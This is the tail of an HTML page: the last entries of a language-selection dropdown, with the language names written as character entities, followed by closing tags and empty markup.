<option value="si"> &#8234;&#3523;&#3538;&#3458;&#3524;&#3517;&#8236; </option>
<option value="th"> &#8234;&#3652;&#3607;&#3618;&#8236; </option>
<option value="lo"> &#8234;&#3749;&#3762;&#3751;&#8236; </option>
<option value="km"> &#8234;&#6017;&#6098;&#6040;&#6082;&#6042;&#8236; </option>
<option value="ko"> &#8234;&#54620;&#44397;&#50612;&#8236; </option>
<option value="zh-HK"> &#8234;&#20013;&#25991;&#65288;&#39321;&#28207;&#65289;&#8236; </option>
<option value="ja"> &#8234;&#26085;&#26412;&#35486;&#8236; </option>
<option value="zh-CN"> &#8234;&#31616;&#20307;&#20013;&#25991;&#8236; </option>
<option value="zh-TW"> &#8234;&#32321;&#39636;&#20013;&#25991;&#8236; </option>
</select>
</span> </div>
</div>
</div>
</div>

<br>

<br>

<div>
</div>

</body></html>